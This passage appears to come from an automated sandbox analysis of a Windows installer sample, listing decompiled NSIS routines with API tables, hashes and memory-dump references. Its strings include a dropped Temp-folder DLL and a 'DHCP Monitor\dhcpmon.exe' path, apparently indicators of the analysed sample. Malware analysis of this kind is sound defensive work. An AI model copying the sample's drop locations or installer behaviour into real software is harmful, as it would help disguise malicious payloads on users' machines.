                                                                    0x00401803
                                                                    0x00401806
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00401808
                                                                    0x0040180b
                                                                    0x00401865
                                                                    0x0040186a
                                                                    0x004015b0
                                                                    0x004027bf
                                                                    0x004027bf
                                                                    0x00402a5a
                                                                    0x00402a5d
                                                                    0x00402a5d
                                                                    0x00000000
                                                                    0x0040180d
                                                                    0x00401813
                                                                    0x0040181e
                                                                    0x0040182b
                                                                    0x00401836
                                                                    0x0040184c
                                                                    0x0040184c
                                                                    0x0040184f
                                                                    0x00000000
                                                                    0x00401855
                                                                    0x00401855
                                                                    0x00401856
                                                                    0x00401873
                                                                    0x00402a63
                                                                    0x00402a63
                                                                    0x00402a63
                                                                    0x00401858
                                                                    0x00401858
                                                                    0x00401859
                                                                    0x00401492
                                                                    0x00402387
                                                                    0x00402387
                                                                    0x00402387
                                                                    0x00401856
                                                                    0x0040184f
                                                                    0x00402a65
                                                                    0x00402a69
                                                                    0x00402a69
                                                                    0x00401883
                                                                    0x00401888
                                                                    0x00401896
                                                                    0x0040189b
                                                                    0x004018a1
                                                                    0x004018a5
                                                                    0x004018a7
                                                                    0x004018af
                                                                    0x004018bb
                                                                    0x004018a9
                                                                    0x004018a9
                                                                    0x004018ad
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004018ad
                                                                    0x004018c4
                                                                    0x004018ca
                                                                    0x004018cc
                                                                    0x00000000
                                                                    0x004018d2
                                                                    0x004018d2
                                                                    0x004018d5
                                                                    0x004018ed
                                                                    0x004018d7
                                                                    0x004018da
                                                                    0x004018e3
                                                                    0x004018e3
                                                                    0x004018f2
                                                                    0x004018f7
                                                                    0x00402382
                                                                    0x00000000
                                                                    0x00402382
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dll,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                    • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dll,C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dll,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dll,C:\Users\user~1\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                      • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                      • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                      • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp$C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dll$Error opening file for writing: C:\Users\user~1\AppData\Local\Temp\ri8clfcgml62un.dllClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                    • API String ID: 1941528284-3340949911
                                                                    • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                    • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                    • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                    • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                    0x0040652a
                                                                    0x00406532
                                                                    0x00406546
                                                                    0x00406546
                                                                    0x0040654c
                                                                    0x00406559
                                                                    0x00406559
                                                                    0x0040655a
                                                                    0x0040655c
                                                                    0x00406560
                                                                    0x00406562
                                                                    0x0040656b
                                                                    0x0040656d
                                                                    0x00406587
                                                                    0x0040658f
                                                                    0x0040658f
                                                                    0x00406594
                                                                    0x00406596
                                                                    0x00406598
                                                                    0x0040659c
                                                                    0x0040659d
                                                                    0x004065a0
                                                                    0x004065a8
                                                                    0x004065aa
                                                                    0x004065ae
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004065b4
                                                                    0x004065b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004065b9
                                                                    0x004065be

                                                                    APIs
                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                    • CharNextA.USER32(?,"C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                    • CharPrevA.USER32(?,?,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406529
                                                                    • *?|<>/":, xrefs: 00406570
                                                                    • "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0, xrefs: 00406564
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 589700163-70715519
                                                                    • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                    • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                    • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                    • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                    0x0040434a
                                                                    0x00404400
                                                                    0x00000000
                                                                    0x00404400
                                                                    0x0040435b
                                                                    0x0040435f
                                                                    0x00000000
                                                                    0x00404379
                                                                    0x00404379
                                                                    0x00404382
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404384
                                                                    0x00404390
                                                                    0x00404393
                                                                    0x00404393
                                                                    0x00404399
                                                                    0x0040439f
                                                                    0x0040439f
                                                                    0x004043ab
                                                                    0x004043b1
                                                                    0x004043b8
                                                                    0x004043bb
                                                                    0x004043be
                                                                    0x004043c0
                                                                    0x004043c0
                                                                    0x004043c8
                                                                    0x004043ce
                                                                    0x004043ce
                                                                    0x004043d8
                                                                    0x004043dd
                                                                    0x004043e0
                                                                    0x004043e5
                                                                    0x004043e8
                                                                    0x004043e8
                                                                    0x004043f8
                                                                    0x004043f8
                                                                    0x00000000
                                                                    0x004043fb

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                    • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                    • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                    0x0040537a
                                                                    0x00405386
                                                                    0x00405389
                                                                    0x0040538f
                                                                    0x0040539b
                                                                    0x0040539e
                                                                    0x004053a1
                                                                    0x004053a7
                                                                    0x004053a7
                                                                    0x004053ad
                                                                    0x004053b5
                                                                    0x004053b8
                                                                    0x004053d5
                                                                    0x004053d9
                                                                    0x004053e2
                                                                    0x004053e2
                                                                    0x004053ec
                                                                    0x004053f5
                                                                    0x00405401
                                                                    0x00405408
                                                                    0x0040540c
                                                                    0x0040540f
                                                                    0x00405422
                                                                    0x00405430
                                                                    0x00405430
                                                                    0x00405434
                                                                    0x00405436
                                                                    0x00405439
                                                                    0x00000000
                                                                    0x00405439
                                                                    0x004053ba
                                                                    0x004053c2
                                                                    0x004053ca
                                                                    0x004053d0
                                                                    0x00000000
                                                                    0x004053d0
                                                                    0x004053ca
                                                                    0x004053b8
                                                                    0x00405443

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                    • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                    • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                    • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                    • SendMessageA.USER32 ref: 00405408
                                                                    • SendMessageA.USER32 ref: 00405422
                                                                    • SendMessageA.USER32 ref: 00405430
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2531174081-0
                                                                    • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                    • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                    • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                    • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                    0x00402e5e
                                                                    0x00402e60
                                                                    0x00402e67
                                                                    0x00402e6a
                                                                    0x00402e6a
                                                                    0x00402e70
                                                                    0x00000000
                                                                    0x00402e70
                                                                    0x00402e7e
                                                                    0x00000000
                                                                    0x00402e81
                                                                    0x00402e88
                                                                    0x00402e94
                                                                    0x00402e9c
                                                                    0x00402eda
                                                                    0x00402ee3
                                                                    0x00000000
                                                                    0x00402ee8
                                                                    0x00402ea5
                                                                    0x00402eb6
                                                                    0x00000000
                                                                    0x00402ec4
                                                                    0x00402ea5
                                                                    0x00402ef0

                                                                    APIs
                                                                    • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                                    • GetTickCount.KERNEL32 ref: 00402E88
                                                                    • wsprintfA.USER32 ref: 00402EB6
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                      • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                      • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                      • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 722711167-2449383134
                                                                    • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                    • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                    • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                    • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                    0x00404c32
                                                                    0x00404c3f
                                                                    0x00404c45
                                                                    0x00404c83
                                                                    0x00404c83
                                                                    0x00404c92
                                                                    0x00404c99
                                                                    0x00000000
                                                                    0x00404c9b
                                                                    0x00404c47
                                                                    0x00404c56
                                                                    0x00404c5e
                                                                    0x00404c61
                                                                    0x00404c73
                                                                    0x00404c79
                                                                    0x00404c80
                                                                    0x00000000
                                                                    0x00404c80
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                    • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                    • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				if(CreateDirectoryA(_a4,  &_v16) != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}






                                                                    0x00405845
                                                                    0x00405849
                                                                    0x0040584c
                                                                    0x00405852
                                                                    0x00405856
                                                                    0x0040585a
                                                                    0x00405862
                                                                    0x00405869
                                                                    0x0040586f
                                                                    0x00405876
                                                                    0x00405885
                                                                    0x00405887
                                                                    0x00000000
                                                                    0x00405887
                                                                    0x00405891
                                                                    0x00405898
                                                                    0x004058ae
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004058b0
                                                                    0x004058b4

                                                                    APIs
                                                                    • CreateDirectoryA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040587D
                                                                    • GetLastError.KERNEL32 ref: 00405891
                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                    • GetLastError.KERNEL32 ref: 004058B0
                                                                    Strings
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405860
                                                                    • C:\Program Files (x86)\DHCP Monitor, xrefs: 0040583A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.497171898.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000A.00000002.497115803.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497220008.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497348781.0000000000415000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497472743.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497551994.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497605906.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000A.00000002.497644833.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: C:\Program Files (x86)\DHCP Monitor$C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 3449924974-3710644837
                                                                    • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
